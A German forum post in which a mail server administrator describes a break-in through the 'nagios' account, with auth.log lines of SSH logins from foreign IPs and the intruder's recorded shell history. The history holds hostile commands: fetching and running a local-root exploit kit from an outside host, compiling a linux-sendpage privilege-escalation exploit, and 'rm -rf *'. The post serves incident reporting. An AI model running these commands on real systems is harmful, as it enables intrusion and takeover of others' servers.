Moin!
Ich habe mich gerade gewundert dass emin Mailserver keine Mails mehr annimmt (Temp delivery error). Beim Blick ind ie Logs mault amavis "cannot allocate memory" und tatsächlich - 200%CPU und 98% RAM belegt von einem Prozess namens "./exploit" - ausgeführt vom User "nagios"
Ist etwas bekannt, oder ist das nur ein harmloser Prozess vom echten nagios?
Ich habe den server schnell rebootet, da nichtsmehr ging und selbst kill seine Arbeit verweigerte. ein find / -name "exploit" brachte null Ergebnisse. cat /var/log/syslo*|grep exploit ebenfalls nichts.
Kann es sein, dass nagios ein Standardpasswort für sienen Account setzt und den login nciht verbietet, was eigentlich ja für apt-installationen untypisch ist?
auth.log:
also wenn nichts bekannt ist, werde ich Anzeige gegen unbekannt über die IP wegen unbefugten eindringens in den Server erstatten.
//Edit: Okay Anzeige:
Ich habe mich gerade gewundert dass emin Mailserver keine Mails mehr annimmt (Temp delivery error). Beim Blick ind ie Logs mault amavis "cannot allocate memory" und tatsächlich - 200%CPU und 98% RAM belegt von einem Prozess namens "./exploit" - ausgeführt vom User "nagios"
Ist etwas bekannt, oder ist das nur ein harmloser Prozess vom echten nagios?
Ich habe den server schnell rebootet, da nichtsmehr ging und selbst kill seine Arbeit verweigerte. ein find / -name "exploit" brachte null Ergebnisse. cat /var/log/syslo*|grep exploit ebenfalls nichts.
Kann es sein, dass nagios ein Standardpasswort für sienen Account setzt und den login nciht verbietet, was eigentlich ja für apt-installationen untypisch ist?
auth.log:
Code:
...
Dec 24 15:01:09 fse su[1929]: + console root:nagios
Dec 24 15:01:09 fse su[1929]: pam_unix(su:session): session opened for user nagios by (uid=0)
Dec 24 15:01:09 fse su[1929]: pam_unix(su:session): session closed for user nagios
<< Seit hier bin ich nichtmehr am Server gewesen. >>
Dec 24 19:33:23 fse sshd[29935]: Accepted password for nagios from 212.18.195.102 port 41583 ssh2
Dec 24 19:33:23 fse sshd[29935]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 24 19:33:23 fse sshd[29937]: Accepted password for nagios from 212.18.195.102 port 55304 ssh2
Dec 24 19:33:23 fse sshd[29937]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 24 19:33:29 fse sshd[29935]: pam_unix(sshd:session): session closed for user nagios
Dec 24 19:33:29 fse sshd[29937]: pam_unix(sshd:session): session closed for user nagios
Dec 25 06:11:33 fse sshd[2094]: Accepted password for nagios from 77.42.228.134 port 49571 ssh2
Dec 25 06:11:33 fse sshd[2094]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 25 06:11:40 fse sshd[2094]: pam_unix(sshd:session): session closed for user nagios
Dec 25 06:11:50 fse sshd[2133]: Accepted password for nagios from 77.42.228.134 port 49572 ssh2
Dec 25 06:11:50 fse sshd[2133]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 25 06:11:54 fse sshd[2133]: pam_unix(sshd:session): session closed for user nagios
Dec 25 07:37:23 fse sshd[19612]: Accepted password for nagios from 77.42.228.134 port 49852 ssh2
Dec 25 07:37:23 fse sshd[19612]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 25 07:37:32 fse passwd[19660]: pam_unix(passwd:chauthtok): password changed for nagios
Dec 25 07:37:34 fse sshd[19612]: pam_unix(sshd:session): session closed for user nagios
Dec 25 07:37:50 fse sshd[19680]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=77.42.228.134 user=nagios
Dec 25 07:37:53 fse sshd[19680]: Failed password for nagios from 77.42.228.134 port 49856 ssh2
Dec 25 07:37:58 fse sshd[19680]: Accepted password for nagios from 77.42.228.134 port 49856 ssh2
Dec 25 07:37:58 fse sshd[19680]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 25 07:38:01 fse sshd[19680]: pam_unix(sshd:session): session closed for user nagios
Dec 26 10:49:19 fse sshd[32591]: Accepted password for nagios from 77.42.137.153 port 49602 ssh2
Dec 26 10:49:19 fse sshd[32591]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 26 10:50:11 fse sshd[32591]: pam_unix(sshd:session): session closed for user nagios
Dec 26 14:28:24 fse sshd[5302]: Accepted password for nagios from 94.187.88.190 port 51187 ssh2
Dec 26 14:28:24 fse sshd[5302]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 26 14:28:30 fse sshd[5302]: pam_unix(sshd:session): session closed for user nagios
Dec 26 15:03:58 fse sshd[6116]: Accepted password for nagios from 94.187.88.190 port 51389 ssh2
Dec 26 15:03:58 fse sshd[6116]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 26 15:07:27 fse sshd[6116]: pam_unix(sshd:session): session closed for user nagios
<< hier bin ich wieder rein >>
Dec 27 02:00:42 fse su[1917]: Successful su for nagios by root
Dec 27 02:00:42 fse su[1917]: + console root:nagios
Dec 27 02:00:42 fse su[1917]: pam_unix(su:session): session opened for user nagios by (uid=0)
Dec 27 02:00:42 fse su[1917]: pam_unix(su:session): session closed for user nagios
also wenn nichts bekannt ist, werde ich Anzeige gegen unbekannt über die IP wegen unbefugten eindringens in den Server erstatten.
//Edit: Okay Anzeige:
Code:
w
uname -a
exit
w
exit
passwd
exit
exit
uname -a
exit
id
wget http://www.freewebtown.com/lavasoul/null.gz
tar zxvf null.gz
cd enlightenment/
./run_null_exploits.sh
id
./run_null_exploits.sh
ls
uname -a
cd ..
ls
rm -rf *
exit
ls
uname -a
ls
ps -x
gcc
mkdir .x
cd .x
wget http://208.75.230.43/lavasoul/lsp.txt
mv lsp.txt linux-sendpage.c
gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
./linux-sendpage
exit